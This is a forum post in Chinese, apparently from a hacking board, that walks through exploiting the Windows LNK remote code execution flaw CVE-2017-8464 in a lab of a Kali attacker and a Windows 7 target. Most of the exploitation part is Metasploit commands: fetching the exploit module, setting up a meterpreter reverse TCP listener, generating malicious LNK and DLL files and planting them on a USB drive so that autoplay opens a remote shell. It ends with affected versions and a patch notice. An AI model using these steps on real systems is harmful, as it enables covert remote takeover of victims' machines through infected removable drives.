taibeihacker
Moderator
0x01 前言
RCE漏洞存在於Windows處理LNK文件的環節。攻擊者利用漏洞可以獲得與本地用戶相同的用戶權限。被使用此漏洞攻擊時,用戶權限較少的賬戶相較管理員權限的用戶受到的影響更小。攻擊者可以給受害者一個惡意的LNK 文件和關聯的惡意二進制,文件可以存放在可移動磁盤或遠程共享中。當用戶用Windows 資源管理器或任何其他能夠解析LNK文件的軟件,打開此驅動器(或遠程共享) 時,惡意文件就會在目標系統上執行攻擊者的代碼。
0x02 漏洞环境搭建与利用
漏洞环境搭建:kalix86 192.168.1.109 攻擊機windows7x64 192.168.1.101 目標靶機
漏洞利用:1.kali主機下載cve_2017_8464_lnk_rce.rb:
cd /opt
wget https://raw.githubusercontent.com/y...s/windows/fileformat/cve_2017_8464_lnk_rce.rb

2.將cve_2017_8464_lnk_rce.rb拷貝到
/usr/share/metasploit-framework/modules/exploit/windows/smb/目錄下:
cp cve_2017_8464_lnk_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/

3.生成監聽shell:
msf use exploit/multi/handler
msf exploit(handler) set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf exploit(handler) set LHOST 192.168.1.109
msf exploit(handler) exploit -j

4生成大量的.LNK文件(對應盤符從D盤到Z盤)和要加載的.dll文件(後門文件, copy了一個lnk文件(根據插入靶機U盤後識別的盤符,例如我插入U盤後顯示的E盤,所以就選擇了E結尾的lnk文件)和dll文件到U盤)
msf exploit(handler) back
msf use exploit/windows/smb/cve_2017_8464_lnk_rce
msf exploit(cve_2017_8464_lnk_rce) set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf exploit(cve_2017_8464_lnk_rce) set LHOST 192.168.1.109
msf exploit(cve_2017_8464_lnk_rce) exploit

5.將/root/.msf4/local/*所有文件拷貝到/opt目錄下的test文件夾中,然後拷貝到目標靶機windows7X64上
root@backlion:~# cd /opt
root@backlion:/opt# mkdir test
root@backlion:/opt# cp /root/.msf4/local/* test/
root@backlion:/opt# cd test/
root@backlion:/opt/test# ls

拷貝的本機win7x64上:

6.然後點擊快捷鍵,就會觸發註冊dll文件,如果不行直接註冊dll文件(一般是將這項快捷鍵和DLL文件拷貝到一個文件夾裡面然後拷貝到U盤,只要對方開了U盤自動啟動播放功能,就會自動觸發註冊dll文件)

7.在kali下可以看到成功獲得sesions會話為1
sessions -i 1

8.然後進入到會話,就會成功進入到metermter的shell界面:

0x03漏洞影响与修复
漏洞影响:Windows 10Windows 7
Windows 8.1
Windows RT 8.1
Windows Server 2008
Windows Server 2008 R2
Windows Server 2012
Windows Server 2012 R2
Windows Server 2016
漏洞修复:下載補丁,其地址為:
Microsoft 安全公告 4025685:受支持平台指导2017 年 6 月 13 日 - Microsoft 支持
此安全更新可解决 Windows 中的一个漏洞,该漏洞可能允许
